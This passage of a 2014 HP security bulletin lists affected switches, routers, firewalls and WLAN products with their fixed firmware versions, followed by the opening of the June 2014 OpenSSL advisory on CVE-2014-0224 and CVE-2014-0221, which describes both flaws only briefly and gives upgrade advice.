5500.HI_5.20.R5501P02\n5500.HI_5.20.R5501P02-US\n JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch\nJG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch\nJG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt\nJG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt\nJG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt\nJG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt\nJG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt\nJG681A HP 5500-24G-SFP HI TAA Swch w/2Slt\n\n5500 EI Switch Series\n 5500.EI-4800G_5.20.R2221P05\n5500.EI-4800G_5.20.R2221P04-US\n JD373A HP 5500-24G DC EI Switch\nJD374A HP 5500-24G-SFP EI Switch\nJD375A HP 5500-48G EI Switch\nJD376A HP 5500-48G-PoE EI Switch\nJD377A HP 5500-24G EI Switch\nJD378A HP 5500-24G-PoE EI Switch\nJD379A HP 5500-24G-SFP DC EI Switch\nJG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts\nJG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts\nJG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts\nJG250A HP 5500-24G EI TAA Switch w 2 Intf Slts\nJG251A HP 5500-48G EI TAA Switch w 2 Intf Slts\nJG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts\nJG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts\n H3C S5500-28C-EI Ethernet Switch (0235A253)\nH3C S5500-28F-EI Eth Switch AC Single (0235A24U)\nH3C S5500-52C-EI Ethernet Switch (0235A24X)\nH3C S5500-28C-EI-DC Ethernet Switch (0235A24S)\nH3C S5500-28C-PWR-EI Ethernet Switch (0235A255)\nH3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259)\nH3C S5500-52C-PWR-EI Ethernet Switch (0235A251)\n\n5500 SI Switch Series\n 5500.SI_5.20.R2221P04\n JD369A HP 5500-24G SI Switch\nJD370A HP 5500-48G SI Switch\nJD371A HP 5500-24G-PoE SI Switch\nJD372A HP 5500-48G-PoE SI Switch\nJG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts\nJG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts\n H3C S5500-28C-SI Ethernet Switch (0235A04U)\nH3C S5500-52C-SI Ethernet Switch (0235A04V)\nH3C S5500-28C-PWR-SI Ethernet Switch (0235A05H)\nH3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)\n\n5120 EI Switch Series\n 5120.EI-4210G-4510G_5.20.R2221P04\n5120.EI-4210G-4510G_5.20.R2221P04-US\n JE066A HP 5120-24G EI Switch\nJE067A HP 5120-48G EI Switch\nJE068A HP 5120-24G EI Switch with 2 Slots\nJE069A HP 5120-48G EI Switch with 2 Slots\nJE070A HP 5120-24G-PoE EI Switch with 2 Slots\nJE071A HP 5120-48G-PoE EI Switch with 2 Slots\nJG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts\nJG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts\nJG245A HP 5120-24G EI TAA Switch w 2 Intf Slts\nJG246A HP 5120-48G EI TAA Switch w 2 Intf Slts\nJG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts\nJG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts\n H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ)\nH3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS)\nH3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR)\nH3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT)\nH3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU)\nH3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)\n\n5120 SI switch Series\n 5120.SI_5.20.R1513P86\n JE072A HP 5120-48G SI Switch\nJE073A HP 5120-16G SI Switch\nJE074A HP 5120-24G SI Switch\nJG091A HP 5120-24G-PoE+ (370W) SI Switch\nJG092A HP 5120-24G-PoE+ (170W) SI Switch\n H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W)\nH3C S5120-20P-SI L2\n16GE Plus 4SFP (0235A42B)\nH3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D)\nH3C S5120-28P-HPWR-SI (0235A0E5)\nH3C S5120-28P-PWR-SI (0235A0E3)\n\n4800 G Switch Series\n 5500.EI-4800G_5.20.R2221P05\n5500.EI-4800G_5.20.R2221P04-US\n JD007A HP 4800-24G Switch\nJD008A HP 4800-24G-PoE Switch\nJD009A HP 4800-24G-SFP Switch\nJD010A HP 4800-48G Switch\nJD011A HP 4800-48G-PoE Switch\n\n 3Com Switch 4800G 24-Port (3CRS48G-24-91)\n3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91)\n3Com Switch 4800G 48-Port (3CRS48G-48-91)\n3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91)\n3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91)\n\n4510G Switch Series\n 5500.EI-4800G_5.20.R2221P05\n5500.EI-4800G_5.20.R2221P04-US\n JF428A HP 4510-48G Switch\nJF847A HP 4510-24G Switch\n\n 3Com Switch 4510G 48 Port (3CRS45G-48-91)\n3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91)\n3Com Switch E4510-24G (3CRS45G-24-91)\n\n4210G Switch Series\n 5120.EI-4210G-4510G_5.20.R2221P04\n5120.EI-4210G-4510G_5.20.R2221P04-US\n JF844A HP 4210-24G Switch\nJF845A HP 4210-48G Switch\nJF846A HP 4210-24G-PoE Switch\n\n 3Com Switch 4210-24G (3CRS42G-24-91)\n3Com Switch 4210-48G (3CRS42G-48-91)\n3Com Switch E4210-24G-PoE (3CRS42G-24P-91)\n\n3610 Switch Series\n S3610-5510_5.20.R5319P08\n JD335A HP 3610-48 Switch\nJD336A HP 3610-24-4G-SFP Switch\nJD337A HP 3610-24-2G-2G-SFP Switch\nJD338A HP 3610-24-SFP Switch\n H3C S3610-52P - model LS-3610-52P-OVS (0235A22C)\nH3C S3610-28P - model LS-3610-28P-OVS (0235A22D)\nH3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E)\nH3C S3610-28F - model LS-3610-28F-OVS (0235A22F)\n\n3600 V2 Switch Series\n 3600V2_5.20.R2109P05\n JG299A HP 3600-24 v2 EI Switch\nJG300A HP 3600-48 v2 EI Switch\nJG301A HP 3600-24-PoE+ v2 EI Switch\nJG301B HP 3600-24-PoE+ v2 EI Switch\nJG302A HP 3600-48-PoE+ v2 EI Switch\nJG302B HP 3600-48-PoE+ v2 EI Switch\nJG303A HP 3600-24-SFP v2 EI Switch\nJG304A HP 3600-24 v2 SI Switch\nJG305A HP 3600-48 v2 SI Switch\nJG306A HP 3600-24-PoE+ v2 SI Switch\nJG306B HP 3600-24-PoE+ v2 SI Switch\nJG307A HP 3600-48-PoE+ v2 SI Switch\nJG307B HP 3600-48-PoE+ v2 SI Switch\n\n3100V2\n 3100V2_5.20.R5203P07\n JD313B HP 3100-24-PoE v2 EI Switch\nJD318B HP 3100-8 v2 EI Switch\nJD319B HP 3100-16 v2 EI Switch\nJD320B HP 3100-24 v2 EI Switch\nJG221A HP 3100-8 v2 SI Switch\nJG222A HP 3100-16 v2 SI Switch\nJG223A HP 3100-24 v2 SI Switch\n\n3100V2-48\n 3100V2.48_5.20.R2109P05\n JG315A HP 3100-48 v2 Switch\n\n1920.0\n 1920-48G-JG927A_5.20.R1104\n1920-8G-PoE-65W-JG921A_5.20.R1104\n1920-8G-JG920A_5.20.R1104\n1920-24G-PoE-370W-JG926A_5.20.R1104\n1920-24G-PoE-180W-JG925A_5.20.R1104\n1920-24G-JG924A_5.20.R1104\n1920-16G-JG923A_5.20.R1104\n1920-8G-PoE-180W-JG922A_5.20.R1104\n JG927A HP 1920-48G Switch\nJG921A HP 1920-8G-PoE+ (65W) Switch\nJG920A HP 1920-8G Switch\nJG926A HP 1920-24G-PoE+ (370W) Switch\nJG925A HP 1920-24G-PoE+ (180W) Switch\nJG924A HP 1920-24G Switch\nJG923A HP 1920-16G Switch\nJG922A HP 1920-8G-PoE+ (180W) Switch\n\n1910.0\n 1910-8-POE-JG537_5.20.R1106\n1910-48-JG540_5.20.R1106\n1910-24-JG538_5.20.R1106\n1910-24-POE-JG539_5.20.R1106\n1910-8-JG536_5.20.R1106\n JG537A HP 1910-8 -PoE+ Switch\nJG540A HP 1910-48 Switch\nJG538A HP 1910-24 Switch\nJG539A HP 1910-24-PoE+ Switch\nJG536A HP 1910-8 Switch\n\n1810v1 P2\n Fix in progress\nuse mitigations\n J9449A HP 1810-8G Switch\nJ9450A HP 1810-24G Switch\n\n1810v1 PK\n Fix in progress\nuse mitigations\n J9660A HP 1810-48G Switch\n\nMSR20\n MSR20.SI_5.20.R2513P02\n JD432A HP A-MSR20-21 Multi-Service Router\nJD662A HP MSR20-20 Multi-Service Router\nJD663A HP MSR20-21 Multi-Service Router\nJD663B HP MSR20-21 Router\nJD664A HP MSR20-40 Multi-Service Router\nJF228A HP MSR20-40 Router\nJF283A HP MSR20-20 Router\n H3C RT-MSR2020-AC-OVS-H3C (0235A324)\nH3C RT-MSR2040-AC-OVS-H3 (0235A326)\nH3C MSR 20-20 (0235A19H)\nH3C MSR 20-21 (0235A325)\nH3C MSR 20-40 (0235A19K)\nH3C MSR-20-21 Router (0235A19J)\n\nMSR20-1X\n MSR201X_5.20.R2513P02\n JD431A HP MSR20-10 Router\nJD667A HP MSR20-15 IW Multi-Service Router\nJD668A HP MSR20-13 Multi-Service Router\nJD669A HP MSR20-13 W Multi-Service Router\nJD670A HP MSR20-15 A Multi-Service Router\nJD671A HP MSR20-15 AW Multi-Service Router\nJD672A HP MSR20-15 I Multi-Service Router\nJD673A HP MSR20-11 Multi-Service Router\nJD674A HP MSR20-12 Multi-Service Router\nJD675A HP MSR20-12 W Multi-Service Router\nJD676A HP MSR20-12 T1 Multi-Service Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\nJG209A HP MSR20-12-T-W Router (NA)\nJG210A HP MSR20-13-W Router (NA)\n H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\nH3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-11 (0235A31V)\nH3C MSR 20-12 (0235A32E)\nH3C MSR 20-12 T1 (0235A32B)\nH3C MSR 20-13 (0235A31W)\nH3C MSR 20-13 W (0235A31X)\nH3C MSR 20-15 A (0235A31Q)\nH3C MSR 20-15 A W (0235A31R)\nH3C MSR 20-15 I (0235A31N)\nH3C MSR 20-15 IW (0235A31P)\nH3C MSR20-12 W (0235A32G)\n\nMSR30\n MSR30.SI_5.20.R2513P02\n JD654A HP MSR30-60 POE Multi-Service Router\nJD657A HP MSR30-40 Multi-Service Router\nJD658A HP MSR30-60 Multi-Service Router\nJD660A HP MSR30-20 POE Multi-Service Router\nJD661A HP MSR30-40 POE Multi-Service Router\nJD666A HP MSR30-20 Multi-Service Router\nJF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF232A HP RT-MSR3040-AC-OVS-AS-H3\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S)\nH3C MSR 30-20 (0235A19L)\nH3C MSR 30-20 POE (0235A239)\nH3C MSR 30-40 (0235A20J)\nH3C MSR 30-40 POE (0235A25R)\nH3C MSR 30-60 (0235A20K)\nH3C MSR 30-60 POE (0235A25S)\nH3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)\n\nMSR30-16\n MSR3016.SI_5.20.R2513P02\n JD659A HP MSR30-16 POE Multi-Service Router\nJD665A HP MSR30-16 Multi-Service Router\nJF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\nH3C MSR 30-16 (0235A237)\nH3C MSR 30-16 POE (0235A238)\n\nMSR30-1X\n MSR301X.SI_5.20.R2513P09\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\nH3C RT-MSR3011-AC-OVS-H3 (0235A29L)\n\nMSR50\n MSR50.SI_5.20.R2513P02\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\n\nMSR50-G2\n MSR50.EPUSI_5.20.R2513P02\n JD429A HP MSR50 G2 Processor Module\nJD429B HP MSR50 G2 Processor Module\n H3C H3C MSR 50 Processor Module-G2 (0231A84Q)\nH3C MSR 50 High Performance Main Processing Unit 3GE (Combo)\n256F/1GD(0231A0KL)\n\nMSR20 Russian version\n MSR20.SI_5.20.R2513L03.RU\n JD663B HP MSR20-21 Router\nJF228A HP MSR20-40 Router\nJF283A HP MSR20-20 Router\n H3C RT-MSR2020-AC-OVS-H3C (0235A324)\nH3C RT-MSR2040-AC-OVS-H3 (0235A326)\n\nMSR20-1X Russian version\n MSR201X_5.20.R2513L03.RU\n JD431A HP MSR20-10 Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\n H3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\n\nMSR30 Russian version\n MSR30.SI_5.20.R2513L03.RU\n JF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\n\nMSR30-16 Russian version\n MSR3016.SI_5.20.R2513L03.RU\n JF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\n\nMSR30-1X Russian version\n MSR301X.SI_5.20.R2513L03.RU\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C RT-MSR3011-AC-OVS-H3 (0235A29L)\nH3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\n\nMSR50 Russian version\n MSR50.SI_5.20.R2513L03.RU\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR 50 Processor Module (0231A791)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\n\nMSR50 G2 Russian version\n MSR50.EPUSI_5.20.R2513L03.RU\n JD429B HP MSR50 G2 Processor Module\n H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD\n(0231A0KL)\n\nMSR9XX\n MSR9XX_5.20.R2513P02\n JF812A HP MSR900 Router\nJF813A HP MSR920 Router\nJF814A HP MSR900-W Router\nJF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr\nJG207A HP MSR900-W Router (NA)\nJG208A HP MSR920-W Router (NA)\n H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b\n(0235A0C2)\nH3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX)\nH3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4)\nH3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\n\nMSR93X\n MSR93X_5.20.R2513P02\n JG511A HP MSR930 Router\nJG512A HP MSR930 Wireless Router\nJG513A HP MSR930 3G Router\nJG514A HP MSR931 Router\nJG515A HP MSR931 3G Router\nJG516A HP MSR933 Router\nJG517A HP MSR933 3G Router\nJG518A HP MSR935 Router\nJG519A HP MSR935 Wireless Router\nJG520A HP MSR935 3G Router\nJG531A HP MSR931 Dual 3G Router\nJG596A HP MSR930 4G LTE/3G CDMA Router\nJG597A HP MSR936 Wireless Router\nJG665A HP MSR930 4G LTE/3G WCDMA Global Router\nJG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n\nMSR1000\n MSR1000_5.20.R2513P02\n JG732A HP MSR1003-8 AC Router\n\nMSR1000 Russian version\n MSR1000_5.20.R2513L03-RU\n JG732A HP MSR1003-8 AC Router\n\nMSR2000\n MSR2000_7.10.R0106P02\n JG411A HP MSR2003 AC Router\n\nMSR3000\n MSR3000_7.10.R0106P02\n JG404A HP MSR3064 Router\nJG405A HP MSR3044 Router\nJG406A HP MSR3024 AC Router\nJG409A HP MSR3012 AC Router\nJG861A HP MSR3024 TAA-compliant AC Router\n\nMSR4000\n MSR4000_7.10.R0106P02\n JG402A HP MSR4080 Router Chassis\nJG403A HP MSR4060 Router Chassis\nJG412A HP MSR4000 MPU-100 Main Processing Unit\n\nF5000\n SECPATH5000FA_5.20.F3210P20\n JG216A HP F5000 Firewall Standalone Chassis\nJD259A HP A5000-A5 VPN Firewall Chassis\n H3C SecPath F5000-A5 Host System (0150A0AG)\n\nF5000 C\n F5000C_5.20.R3811\n JG650A HP F5000-C VPN Firewall Appliance\n\nF5000 S\n F5000S_5.20.R3811\n JG370A HP F5000-S VPN Firewall Appliance\n\nU200S and CS\n U200S_U200CS_5.20.F5123P27\n JD268A HP 200-CS UTM Appliance\nJD273A HP U200-S UTM Appliance\n H3C SecPath U200-S (0235A36N)\n\nU200A and M\n U200A_U200M_5.20.F5123P27\n JD274A HP 200-M UTM Appliance\nJD275A HP U200-A UTM Appliance\n H3C SecPath U200-A (0235A36Q)\n\nF1000A and S\n AF1000S.EI_3.40.R3734\n JD270A HP S1000-S VPN Firewall Appliance\nJD271A HP S1000-A VPN Firewall Appliance\nJG213A HP F1000-S-EI VPN Firewall Appliance\nJG214A HP F1000-A-EI VPN Firewall Appliance\n\nSecBlade III\n SECBLADEIII.FW_5.20.R3820\n JG371A HP 12500 20Gbps VPN Firewall Module\nJG372A HP 10500/11900/7500 20Gbps VPN FW Mod\n\nSecBlade FW\n SECBLADE2-FW_5.20.R3181\n JC635A HP 12500 VPN Firewall Module\nJD245A HP 9500 VPN Firewall Module\nJD249A HP 10500/7500 Advanced VPN Firewall Mod\nJD250A HP 6600 Firewall Processing Rtr Module\nJD251A HP 8800 Firewall Processing Module\nJD255A HP 5820 VPN Firewall Module\n H3C S9500E SecBlade VPN Firewall Module (0231A0AV)\nH3C S7500E SecBlade VPN Firewall Module (0231A832)\nH3C SR66 Gigabit Firewall Module (0231A88A)\nH3C SR88 Firewall Processing Module (0231A88L)\nH3C S5820 SecBlade VPN Firewall Module (0231A94J)\n\nF1000E\n SECPATH1000FE_5.20.R3181\n JD272A HP S1000-E VPN Firewall Appliance\n\nVSR1000\n VSR1000_7.10.R0203\n JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software\nJG811AAE HP VSR1001 Comware 7 Virtual Services Router\nJG812AAE HP VSR1004 Comware 7 Virtual Services Router\nJG813AAE HP VSR1008 Comware 7 Virtual Services Router\n\nWX5002/5004\n WX5002-WX5004_5.20.R2507P26\n JD441A HP 5800 ACM for 64-256 APs\nJD447B HP WX5002 Access Controller\nJD448A HP A-WX5004 Access Controller\nJD448B HP WX5004 Access Controller\nJD469A HP A-WX5004 (3Com) Access Controller\nJG261A HP 5800 Access Controller OAA TAA Mod\n\nHP 850/870\n 850-870_5.20.R2607P26\n JG723A HP 870 Unified Wired-WLAN Appliance\nJG725A HP 870 Unifd Wrd-WLAN TAA Applnc\nJG722A HP 850 Unified Wired-WLAN Appliance\nJG724A HP 850 Unifd Wrd-WLAN TAA Applnc\n\nHP 830\n 830_5.20.R3507P26\n JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch\nJG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch\nJG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch\nJG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch\n\nHP 6000\n 6000_5.20.R2507P27\n JG639A HP 10500/7500 20G Unified Wired-WLAN Mod\nJG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod\n\nM220\n Fix in progress\nuse mitigations\n J9798A HP M220 802.11n AM Access Point\nJ9799A HP M220 802.11n WW Access Point\n\nNGFW\n The Software Downloads and software release notes for your NGFW Appliance(s)\ncan be acquired with a valid support contract by accessing the Threat\nManagement Center (TMC). In your web browser\nopen https://tmc.tippingpoint.com. \n JC882A HP S1050F NGFW Aplnc w/DVLabs 1-yr Lic\nJC883A HP S3010F NGFW Aplnc w/DVLabs 1-yr Lic\nJC884A HP S3020F NGFW Aplnc w/DVLabs 1-yr Lic\nJC885A HP S8005F NGFW Aplnc w/DVLabs 1-yr Lic\nJC886A HP S8010F NGFW Aplnc w/DVLabs 1-yr Lic\n\niMC UAM 7.x\n5.x\n iMC UAM 7.0 (E0203P04)\n JD144A HP IMC UAM S/W Module w/200-User License\nJF388A HP IMC UAM S/W Module w/200-user License\nJD435A HP IMC EAD Client Software\nJF388AAE HP IMC UAM S/W Module w/200-user E-LTU\nJG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU\n\niMC EAD 7.x\n5.x\n iMC EAD v7.1 (E0301)\n JF391AAE HP IMC EAD S/W Module w/200-user E-LTU\nJG754AAE HP IMC EAD SW Module w/ 50-user E-LTU\nJD147A HP IMC Endpoint Admission Defense Software Module with 200-user\nLicense\nJF391A HP IMC EAD S/W Module w/200-user License\n\nHISTORY\nVersion:1 (rev.1) - 20 June 2014 Initial release\nVersion:2 (rev.2) - 20 November 2014 Removed iMC Platform Products, 5900\nvirtual switch, and Router 8800 products. Further analysis revealed that\nthose products as not vulnerable. Added additional products. \n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.0.19 (GNU/Linux)\n\niEYEARECAAYFAlRuJqYACgkQ4B86/C0qfVkBZwCg+M/bssV0KI2Nfe2delq1N6KO\n2ZUAoKT/5gXpIsdJb4Jyh8GVclzk70rZ\n=9QSF\n-----END PGP SIGNATURE-----\n. OpenSSL Security Advisory [05 Jun 2014]\n========================================\n\nSSL/TLS MITM vulnerability (CVE-2014-0224)\n===========================================\n\nAn attacker using a carefully crafted handshake can force the use of weak\nkeying material in OpenSSL SSL/TLS clients and servers. This can be exploited\nby a Man-in-the-middle (MITM) attack where the attacker can decrypt and \nmodify traffic from the attacked client and server. \n\nThe attack can only be performed between a vulnerable client *and*\nserver. OpenSSL clients are vulnerable in all versions of OpenSSL. Users\nof OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution. \n\nOpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za. \nOpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m. \nOpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h. \n\nThanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 1st May\n2014 via JPCERT/CC. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team partly based\non an original patch from KIKUCHI Masashi. \n\nDTLS recursion flaw (CVE-2014-0221)\n====================================\n\nBy sending an invalid DTLS handshake to an OpenSSL DTLS client the code\ncan be made to recurse eventually crashing in a DoS attack. \n\nOnly applications using OpenSSL as a DTLS client are affected. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. \n\nThanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This\nissue was reported to 